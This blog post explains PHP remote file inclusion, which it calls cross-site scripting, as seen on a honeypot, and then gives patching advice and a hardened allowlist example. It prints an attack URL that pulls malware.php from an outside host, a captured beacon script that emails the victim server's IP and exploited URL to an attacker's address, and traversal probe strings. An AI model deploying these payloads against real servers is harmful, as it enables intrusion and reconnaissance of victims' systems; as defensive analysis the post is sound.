How does a PHP cross site scripting attack work? What this post calls a PHP cross site scripting attack is, more precisely, remote file inclusion (RFI): some PHP scripts take a file name from a special HTTP parameter and hand it straight to include() or require(), and when PHP's allow_url_include setting is enabled that parameter may be a URL, so the script loads and runs code from any server the attacker names. For example, an attacker could launch the attack against a vulnerable file using a URL such as:
http://myhoneypot.net/scripts/php/vulnerablescript.php?src=http://malwaresite.info/malware.php
The above request would result in vulnerablescript.php fetching malware.php from the attacker's server and executing it on the victim host, with whatever privileges the web server runs under.
One of the simplest attacks I've seen is detailed in the following lines. In this attack, the server sends an email message to komixobh@gmail.com providing the server name and URL exploited. This effectively tells the attacker where their scanning script succeeded, so that they can attack with more advanced scripts.
<?php
// Configuration variables that the beacon itself never uses; they are
// left in place exactly as found on the honeypot.
$language = 'eng';
$auth = 0;
$name = ''; // md5 Login
$pass = ''; // md5 Password
/**************************************************************************************************************************************************************/
error_reporting(0); // stay quiet: no PHP warnings in the victim's output or logs
$time_shell = "".date("d/m/Y - H:i:s").""; // when the include fired
$ip_remote = $_SERVER["REMOTE_ADDR"]; // the scanner's own address
$from_shellcode ='setoran @'.gethostbyname($_SERVER['SERVER_NAME']).''; // forged sender, built from the victim's IP
$to_email = 'komixobh@gmail.com'; // the attacker's drop box
$server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])." - ".$_SERVER['HTTP_HOST'].""; // subject: victim IP and hostname
// Body: the vulnerable URL that was just exploited, the requesting IP and the time
$linkcr = "Ni Bos Link Nya : ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Yang Gunain : $ip_remote - Time: $time_shell";
$header = "From: $from_shellcode
Reply-to: $from_shellcode";
@mail($to_email, $server_mail, $linkcr, $header); // send the beacon from the victim's own mail setup, errors suppressed
?>
Quite genius really: don't let the server admin see your full capabilities in case it's a honeypot. Unfortunately for our attacker, this script reveals his email address (komixobh@gmail.com), which is now posted publicly on my blog. My blog is frequented by spam crawlers on a regular basis, so hopefully komixobh enjoys speaking with Nigerian Princes and receiving offers for male "enhancement" drugs.
The exploit really is that simple: write a PHP script, upload it somewhere, and point vulnerable scripts at it through remote file inclusion.
This is why it's important to always maintain current security patches and follow vendor and industry best practices for securing your web applications. For this particular bug that means two things: keep allow_url_include off in php.ini (it has been off by default since PHP 5.2, so check that nobody turned it on), and never pass a client-supplied value to include() or require() without first mapping it onto a fixed list of files you intended to load. The first stops the remote fetch; only the second stops the same parameter from being used to include local files instead.
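To make the mechanism above and the fix concrete, here is an added example that is not part of the original post or taken from the honeypot: a minimal handler with the same hole as vulnerablescript.php, beside a hardened version of the same "load a script by name" feature. The file names, the scripts/ directory and the helper names are assumptions for the demo; run it from the command line with php to see which inputs the allowlist rejects.

```php
<?php
declare(strict_types=1);

// Added example, not the blog's code. Demonstrates the remote file inclusion
// hole described in the post and one way to close it. Paths and names below
// are hypothetical.

// VULNERABLE: whatever arrives in ?src= goes straight into include().
// With allow_url_include=On (and allow_url_fopen=On) a request such as
//   vulnerablescript.php?src=http://malwaresite.info/malware.php
// makes this server fetch the attacker's PHP and execute it. Even with URL
// includes disabled this is still a local file inclusion hole, because the
// client can name any readable file on disk, e.g. src=../../etc/passwd.
function load_script_vulnerable(string $src): void
{
    include $src;
}

// HARDENED: the parameter is only ever a key into a fixed allowlist, so the
// client can choose between files we picked but can never name a path or a
// URL. Unknown keys are rejected before include() is reached.
const ALLOWED_SCRIPTS = [
    'stats'   => __DIR__ . '/scripts/stats.php',   // assumed file
    'contact' => __DIR__ . '/scripts/contact.php', // assumed file
];

function resolve_script(string $src): ?string
{
    return ALLOWED_SCRIPTS[$src] ?? null;
}

function load_script_safe(string $src): bool
{
    $path = resolve_script($src);
    if ($path === null || !is_file($path)) {
        http_response_code(400);
        return false;
    }
    include $path;
    return true;
}

// Defence in depth, independent of the application code: report whether the
// php.ini switch that makes URL includes possible at all is turned on.
// allow_url_include has been Off by default since PHP 5.2; keep it that way.
function url_include_enabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// Self-check when run from the CLI: php rfi_demo.php
// The probes are constructed inputs: one legitimate key, one RFI payload in
// the shape the post shows, and one LFI-style traversal attempt.
if (PHP_SAPI === 'cli') {
    $probes = [
        'stats',
        'http://malwaresite.info/malware.php',
        '../../etc/passwd',
    ];
    foreach ($probes as $probe) {
        $resolved = resolve_script($probe);
        printf("%-40s -> %s\n", $probe, $resolved === null ? 'rejected' : $resolved);
    }
    printf("allow_url_include: %s\n", url_include_enabled() ? 'ON (turn it off)' : 'off');
}
```

The point of resolve_script() is that the attacker's string never reaches the filesystem or a stream wrapper at all; it is compared against array keys and nothing else. Filtering out "http://" from the parameter would not achieve that, since PHP also understands ftp://, data: and php:// wrappers, and a plain relative path still walks the local disk.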
You can see more example PHP scripts at my Malware Analysis Google Code page.